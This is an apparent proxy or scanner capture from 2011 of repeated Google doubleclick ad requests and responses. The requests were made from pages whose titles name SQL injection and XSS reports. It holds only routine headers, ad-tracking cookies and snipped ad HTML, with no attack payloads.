GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303840507&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Fsql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm&dt=1303822714507&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303822714595&frm=0&adk=1819763764&ga_vid=1959915173.1303822715&ga_sid=1303822715&ga_hid=366037720&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=983&fu=0&ifi=1&dtd=165&xpc=b1RJU4fUjz&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 12:58:26 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 12716
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/sql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.datadirect.com/odbc_64bit%26adT%3D64-bit%2BODBC%2BDriver%26adU%3Dwww.enterprisedb.com%26adT%3DDownload%2BPostgres%2BPlus%26adU%3Dwww.Confio.com/SQL-Server%26adT%3DSQL%2BServer%2B2005%2BTool%26gl%3DUS&usg=AFQjCNEdpwH02TBVWmF3f-ZRuO8j3alMcA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a> ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 14:20:57 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 1722
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835716&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F26%2Fdork%2Fdsaddthiscom%2Fnginx-php-code-execution-via-fastcgi-vulnerability-ghdb-example-poc-report.html&dt=1303817716586&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817716592&frm=0&adk=1607234649&ga_vid=1254415124.1303817717&ga_sid=1303817717&ga_hid=736665545&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=12&xpc=3mvYeb6LF6&p=file%3A// HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 11:35:07 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 4391
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303800338&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Fblind-sql-injection-database-user-admin-http-header-injection-reflected-xss-ghdb-learnbridgefrontcom.htm&dt=1303782338417&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303782338418&frm=0&adk=1819763764&ga_vid=1177448180.1303782338&ga_sid=1303782338&ga_hid=1205769705&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=923&bih=928&eid=33895130&fu=0&ifi=1&dtd=7&xpc=MhckVFz5O1&p=file%3A// HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 01:45:27 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 4366
GET /pagead/ads?client=ca-pub-5253809430940410&output=html&h=250&slotname=9565114904&w=300&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665658&bpp=3&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104&correlator=1303827663964&frm=0&adk=1483788359&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=3&dtd=214&xpc=aKybLTpwRf&p=http%3A//www.spamlaws.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 14:20:56 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 4741
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835639&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Fdsaddthiscom%2Fnginx-php-code-execution-via-fastcgi-vulnerability-ghdb-example-poc-report.html&dt=1303817724379&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817724385&frm=0&adk=1607234649&ga_vid=964658393.1303817724&ga_sid=1303817724&ga_hid=1103745835&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=10&xpc=3MAqWaj0cT&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 11:35:14 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 12474
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/dsaddthiscom/nginx-php-code-execution-via-fastcgi-vulnerability-ghdb-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DVulnerability%2BScanner%26adU%3Dwww.UAT.edu/ia%26adT%3DHacker%2BMasters%26adU%3Dwww.privateinvestigatorchicago.com%26adT%3DHeritage%2BInvestigations%26gl%3DUS&usg=AFQjCNECKJqNegUsBbJSCfrsQwmO7U_Gxw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a> ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303801106&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Flearnbridgefrontcom%2Fdom-based-xss-cross-site-scripting-capec86-cwe-79-dork-ghdb-report-example-poc.html&dt=1303783143017&bpp=6&shv=r20110420&jsv=r20110415&correlator=1303783143025&frm=0&adk=1607234649&ga_vid=2091087362.1303783143&ga_sid=1303783143&ga_hid=1637931588&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=17&xpc=5bvonzgYDQ&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 01:58:53 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 12742
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/learnbridgefrontcom/dom-based-xss-cross-site-scripting-capec86-cwe-79-dork-ghdb-report-example-poc.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.publishorperish.com%26adT%3DGoldMine%2BTraining%2BClasses%26adU%3Dwww.taylorandfrancis.com/Immunology%26adT%3DBe%2BPrepared%2BFor%2BFinals%26adU%3Dwww.lynda.com%26adT%3DHTML%2BTutorials%26gl%3DUS&usg=AFQjCNG22R7uBL9cSYRbq2X_R6FeJvNgTw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a> ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303842225&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F26%2Fdork%2Freflected-xss-account.snap.com_443.htm&dt=1303824225651&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303824225657&frm=0&adk=1819763764&ga_vid=350171340.1303824226&ga_sid=1303824226&ga_hid=1804120403&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=981&bih=999&fu=0&ifi=1&dtd=18&xpc=2QTH1l6RJA&p=file%3A// HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 13:23:35 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 12179
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/26/dork/reflected-xss-account.snap.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.enterprisedb.com%26adT%3DDownload%2BPostgres%2BPlus%26adU%3Dwww.attunity.com/rms-data%26adT%3DRMS%2BData%2BAccess%26adU%3Dwww.Confio.com/Ignite8%26adT%3DSQL%2BServer%2B2005%2BTool%26gl%3DUS&usg=AFQjCNHNWQ1jnc23SY1UrR-Gbfm7_JSgug" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a> ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303842170&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F26%2Fdork%2Floginsisnacom%2Fsql-injection-reflected-xss-cross-site-scripting-example-poc-report.html&dt=1303824170411&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303824170692&frm=0&adk=1607234649&ga_vid=494482213.1303824171&ga_sid=1303824171&ga_hid=1147087629&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=983&fu=0&ifi=1&dtd=468&xpc=d7KWzTUkvG&p=file%3A// HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 13:22:42 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 12647
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/26/dork/loginsisnacom/sql-injection-reflected-xss-cross-site-scripting-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26adU%3DCymphonix.com/Application%252BSecurity%26adT%3DApplication%2BSecurity%26gl%3DUS&usg=AFQjCNEkNd3CDarozCUAjrs0POL3EYlvwg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a> ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-5253809430940410&output=html&h=250&slotname=0023118579&w=300&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665880&bpp=2&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904&correlator=1303827663964&frm=0&adk=386104450&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=4&dtd=13&xpc=eDrJOLuMc9&p=http%3A//www.spamlaws.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 14:20:57 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 4355
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303842233&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F26%2Fdork%2Fsql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm&dt=1303824233832&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303824233843&frm=0&adk=1819763764&ga_vid=1513645573.1303824234&ga_sid=1303824234&ga_hid=2021737263&ga_fc=0&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=981&bih=999&fu=0&ifi=1&dtd=17&xpc=vXrwcSbu7W&p=file%3A// HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 13:23:44 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 12688
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/26/dork/sql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.datadirect.com/ODBC%26adT%3DODBC%2BDrivers%26adU%3Dwww.attunity.com/jdbc-drivers%26adT%3DDownload%2BJDBC%2BDB2%2BDrivers%26adU%3Dwww.enterprisedb.com%26adT%3DDownload%2BPostgres%2BPlus%26gl%3DUS&usg=AFQjCNFKha0rvVJDAQKvBPwj7FnBS26nCQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a> ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303800187&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fblind-sql-injection-database-user-admin-http-header-injection-reflected-xss-ghdb-learnbridgefrontcom.htm&dt=1303782344238&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303782344243&frm=0&adk=1819763764&ga_vid=1662193110.1303782344&ga_sid=1303782344&ga_hid=795164437&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=923&bih=928&fu=0&ifi=1&dtd=10&xpc=7ycypngpbD&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
